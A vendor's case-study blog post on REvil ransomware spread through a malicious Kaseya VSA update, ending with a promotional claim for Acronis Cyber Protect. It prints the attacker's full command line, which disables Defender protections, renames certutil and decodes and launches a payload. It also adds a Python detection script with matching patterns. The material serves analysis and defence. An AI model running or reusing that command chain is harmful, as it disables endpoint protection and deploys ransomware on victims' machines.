01.18.2022 09:02 am

Acronis Cyber Threats Report, Part 3: Chronology of an Attack

Abstract data and figures can illustrate the magnitude of the threat posed by cyber attacks. However, examining a specific case in detail really brings home exactly what’s at stake during a cyber attack and which precise steps can be taken to minimise the damage. In the following example, taken from the Acronis Cyber Threats Report, the target of the attack was a managed service provider (MSP) – an IT service provider that takes over or provides defined services on behalf of a customer. As MSPs manage the IT of around 100 companies on average, they are a particularly attractive target for criminals – who, rather than having to compromise 100 different companies, only need to hack one single MSP to gain access to all of its 100 customers.

In this particular attack, the REvil/Sodinokibi ransomware group succeeded in using Kaseya VSA IT management software, which is commonly used by MSPs, to distribute a malicious update that compromised the systems of service providers and their customers.


Sequence of events
On the evening of 2 July 2021, hackers in the United States began to distribute the ransomware. The timing of the attack was very deliberately planned. Generally, at the start of any long weekend, companies have far fewer employees available than normal who are capable of detecting and taking action against a cyber attack.

The attack exploited a zero-day security hole – a vulnerability that had been identified but had not yet been fixed with a patch. This flaw allowed the criminals to bypass user authentication and access the Kaseya VSA management software, from where they were then able to push their own code to the connected clients.

After first blocking administrator access to the VSA management software, the hackers pushed out a malicious update called “Kaseya VSA Agent Hot-fix” to the connected clients. The code (shown below) used in this update executed multiple PowerShell commands to lower the local security settings – leading, for example, to the deactivation of real-time monitoring and malware notifications.

C:\WINDOWS\system32\cmd.exe /c ping 127.0.0.1 -n 4223 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

One of the PowerShell commands also used the legitimate Certutil tool from Microsoft to decode the encoded malware file named “agent.crt”. The tool was first copied to “C:\Windows\cert.exe”; the decoded malware file “agent.exe” was placed in a Kaseya working folder and was signed with a certificate. Next, agent.exe acted as a “dropper”, placing the REvil encryption module and an old but clean Windows Defender binary in the Windows folder. When Windows Defender was launched, it loaded the malicious DLL via a DLL sideloading weakness and the encryption began.
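As an added example (not part of the Acronis report and not the attacker's code), the following Python script applies detection rules derived from the behaviours described above – Defender tampering via Set-MpPreference, a renamed certutil copy, certutil -decode, and the ping “sleep” – to constructed Sysmon-style process-creation events; the field names and sample values are assumptions.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events in the style of Sysmon Event ID 1
# (Image, OriginalFileName, CommandLine). Built for this example only;
# they are not taken from a real incident log.
SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\WINDOWS\system32\cmd.exe", "orig": "Cmd.Exe",
     "cmdline": r'cmd.exe /c ping 127.0.0.1 -n 4223 > nul & powershell.exe '
                r'Set-MpPreference -DisableRealtimeMonitoring $true -DisableScriptScanning $true'},
    {"host": "ws01", "image": r"C:\Windows\cert.exe", "orig": "CertUtil.exe",
     "cmdline": r"C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe"},
    {"host": "ws02", "image": r"C:\Windows\System32\certutil.exe", "orig": "CertUtil.exe",
     "cmdline": r"certutil.exe -hashfile C:\temp\installer.msi SHA256"},
    {"host": "ws03", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "orig": "PowerShell.EXE", "cmdline": "powershell.exe Get-MpPreference"},
]

def defender_tampering(e):
    # Set-MpPreference switching a protection feature off or silencing cloud reporting.
    return re.search(r"set-mppreference.*?(-disable\w+\s+\$true|-mapsreporting\s+disabled)",
                     e["cmdline"], re.I) is not None

def renamed_certutil(e):
    # PE metadata still says CertUtil.exe although the file on disk has another name.
    return (e["orig"].lower() == "certutil.exe"
            and PureWindowsPath(e["image"]).name.lower() != "certutil.exe")

def certutil_decode(e):
    # certutil -decode used to reconstruct a binary from an encoded file.
    return e["orig"].lower() == "certutil.exe" and re.search(r"\s-decode\s", e["cmdline"], re.I) is not None

def ping_delay(e):
    # ping to loopback with a very large count: a sleep that outwaits sandboxes and analysts.
    m = re.search(r"ping\s+127\.0\.0\.1\s+-n\s+(\d+)", e["cmdline"], re.I)
    return m is not None and int(m.group(1)) > 60

RULES = {"defender_tampering": defender_tampering, "renamed_certutil": renamed_certutil,
         "certutil_decode": certutil_decode, "ping_delay": ping_delay}

def evaluate(events):
    """Return {host: sorted rule names that fired} for every host with at least one hit."""
    hits = {}
    for e in events:
        for name, rule in RULES.items():
            if rule(e):
                hits.setdefault(e["host"], set()).add(name)
    return {h: sorted(r) for h, r in hits.items()}

if __name__ == "__main__":
    for host, fired in evaluate(SAMPLE_EVENTS).items():
        print(host, fired)
```

Several of these rules firing on one host within minutes, as they do for ws01 here, is a far stronger signal than any single one; the benign certutil -hashfile and Get-MpPreference events produce no hits.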

As agent.exe was signed with a valid digital certificate and the malicious DLL was loaded by a legitimate Windows Defender binary, the security tools used by many MSPs were unable to detect the attack.

It’s virtually impossible to verify the claim made by the hackers in the REvil group that they successfully infected one million computers this way. What is certain is that the group demanded 70 million US dollars in exchange for a universal decryption tool.

In any case, MSPs that were using Acronis Cyber Protect weren’t troubled by this demand. Thanks to its integrated and patented detection of process injections, the abnormal behaviour of Kaseya VSA was spotted immediately and the distribution of the malicious updates was stopped.
